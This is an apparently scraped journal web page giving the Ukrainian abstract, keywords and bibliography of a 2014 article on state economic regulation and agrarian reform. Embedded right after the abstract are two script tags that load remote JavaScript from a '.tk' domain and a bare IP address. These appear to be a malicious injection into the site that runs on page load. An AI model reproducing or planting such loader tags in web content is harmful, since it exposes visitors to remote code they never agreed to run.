ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 338.43.02
Проблеми економічної теорії

Вплив державного регулювання економіки на економічні реформи країни / Клочко В. М. // Економіка АПК. - 2014. - № 1 - С. 93

Розглянуто особливості державного регулювання економіки на різних етапах розвитку ринкових відносин. Досліджено аналіз вдалих економічних реформ у країнах, що програли Другу світову війну, але спромоглися завдяки державному регулюванню створити конкурентоспроможні національні економіки. Кількість регулятивних функцій, які виконують держава і ринок, змінюється залежно від рівня техніко-технологічного розвитку, історичного етапу та національних особливостей. Держава не повинна стояти осторонь процесів, які відбуваються в усьому світі, тобто переходу до нового етапу розвитку суспільства - інформаційного. Запропоновано концептуальні висновки щодо розбудови системи державного регулювання АПК в Україні. Необхідно розширити функції державного регулювання щодо відновлення матеріально-технічної бази і застосування сучасних технологій; створити виробничі, обслуговуючі та соціальні кооперативи; усунути диспаритет цін; посилити протекціонізм стосовно національного товаровиробника. Бібліогр.: 30.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: державне регулювання, ринкові відносини, економічні реформи, національна економіка, АПК

Список використаних джерел

 1. Вернадский И. Очерк истории политической экономии / И. Вернадский – СПб.: Ред. экон. указ., 1858. – 224 c.
 2. Витте С.Ю. Национальная экономия и Фридрих Лист / Витте С.Ю. – К.: Киевское слово, 1889. – 60 с.
 3. Гэлбрейт Дж.К. Экономические теории и цели общества ; пер.с англ. / Д.К. Гэлбрейт – М.: Прогресс, 1979. – 304 с.
 4. Давыдова Т.Е. Концепция рыночного хозяйства: формирование, развитие, современный подход / Т.Е. Давыдова // Режим доступа: http: // www.ecsocman.edu.ru/db/msg/272102.htm.
 5. Довбенко М.В. Видатні незнайомці (Наукові ідеї, здобутки та життя економістів – лауреатів Нобелівської премії) / М.В. Довбенко. – Івано-Франківськ, 1995. – 204 с.
 6. Довбенко М.В. Сучасна економічна теорія (Економічна нобелелогія): навч. посіб. [для студ. вищ. навч. закл.] / М.В. Довбенко – К.: Вид. центр «Академія», 2005. – 336 с.
 7. Ежов В. Людвиг Эрхард и «немецкое чудо» / В. Ежов // Режим доступа: http://www.nasledie.ru/oboz/N03_00/03_18.htm.
 8. Измайлов И. Шок не по-нашему / И. Измайлов // Режим доступа: http: // www.epr-magazine.ru/vlast/foreign_exp/german_miracle.htm.
 9. Кейнс Д.М. Общая теория занятости, процента и денег : избранное / Д.М. Кейнс. – М.: Эксмо, 2008. – 960 с.
 10. Конкурентоспроможність економіки України в умовах глобалізації / [Жаліло Я.А., Базилюк Я.Б., Белінська Я.В. та ін.] ; за ред. Я. А. Жаліла. – К.: Нац. ін-т стратегічних досліджень, 2005. – 388 с.
 11. Лист Ф. Национальная система политической экономии ; пер. с нем. / Ф. Лист. – СПб.: Изд. А. Э. Мертенс, 1891. – 452 c.
 12. Маркс К. Капитал / К. Маркс, Ф. Энгельс. – М.: Политиздат, 1960. – 560 с.
 13. Могильний О. Державне регулювання аграрного виробництва в період трансформації економіки / О. Могильний. – К.: Ін-т аграрної економіки УААН, 2002. – 430 с.
 14. Мюрдаль Г. Современные проблемы «третьего» мира / Г. Мюрдаль. – М.: Прогресс, 1972. – 512 с.
 15. Самуэльсон П.Э. Экономика ; пер. с англ. / П. Э. Самуэльсон, В. Д. Нордхаус – М.: Издательский дом «Вильямс», 2003. – 688 с.
 16. Селищев А.С. Китайская экономика в XXΙ веке / А.С. Селищев, Н.А. Селищев. – СПб.: Питер, 2004. – 240 с.
 17. Смирнов А. Опыт Германии: экономическое чудо [Электронный ресурс] / А. Смирнов. – Режим доступа: http://www.contrtv.ru/common/2465.htm.
 18. Стеченко Д.М. Державне регулювання економіки : навч. посіб. [для студ. вищ. навч. закл.] / Д.М. Стеченко. – К.: Знання, 2006. – 262 с.
 19. Тимошина Т.М.  Экономическая история зарубежных стран / Т.М. Тимошина. – М.: Юстицинформ, 2003. – С. 312-332.
 20. Усовский А. Экономика нацистской Германии [Электронный ресурс] / А. Усовский. – Режим доступа: http://ledik1.narod.ru/Staty/EconomikaGermanii.htm.
 21. Фридмен М. Количественная теория денег ; пер. с англ. / М. Фридмен. – М.: Эльф Пресс, 1996. – 132 с.
 22. Черевко Г.В. Державне регулювання економіки в АПК : навч. посіб. [для студ. вищ. навч. закл.] / Г.В. Черевко. – К.: Знання, 2006. – 340 с.
 23. Экономика фашистской Германии [Электронный ресурс]. – Режим доступа: http://4cms.ru/formirovanie-sovremennogo-xozyajstva/52-yekonomika-fashistskoj-germanii.htm.
 24. Ядгаров Я.С. История экономических учений: учеб. [для студ. высш. учеб. завед.] / Я.С. Ядгаров. – М.: ИНФРА, 2006. – 480 с.
 25. Fukuyama Francis. What Happened to the Orange Revolution [Electronic resource] / Francis Fukuyama. – Mode of access: http://www.the-american-interest.com/article.cfm?piece=1069.htm.
 26. Johnson Paul. Wanted: Global Role Models [Electronic resource]. Mode of access: / Paul Johnson. – Mode of access: http://www.forbes.com/forbes/2011/0718/opinions-paul-johnson-current-events-global-role-models.htm.
 27. Klochko V.N. Revolutionary transformations in Ukraine / Klochko V.N., Merchanskiy V.V. // Sp.z o.o. «Nauka i studia». - № 4 (16) – Przemysl, 2009. – P. 48-53.
 28. Rajan Raghuram. Conflict Management and Economic Growth [Electronic resource] / Raghuram Rajan. – Mode of access: http://www.project-syndicate.org/commentary/underdevelopment-and-the-institutions-of-social-peace-y-raghuram-rajan.htm.
 29. Sachs Jeffrey D. The Global Economy’s Corporate Crime Wave [Electronic resource] / Jeffrey D. Sachs. – Mode of access: http://www.project-syndicate.org/commentary/the-global-economy-s-corporate-crime-wave.htm.
 30. Spence Michael. Rebalancing the State’s Balance Sheet [Electronic resource] / Michael Spence. – Mode of access: http://www.project-syndicate.org/commentary/why-states-should-build-asset-portfolios-by-michael-spence.htm.
Читати статтю: 14_01_93-98.pdf
Читати переклад статті: 1401klochko.pdf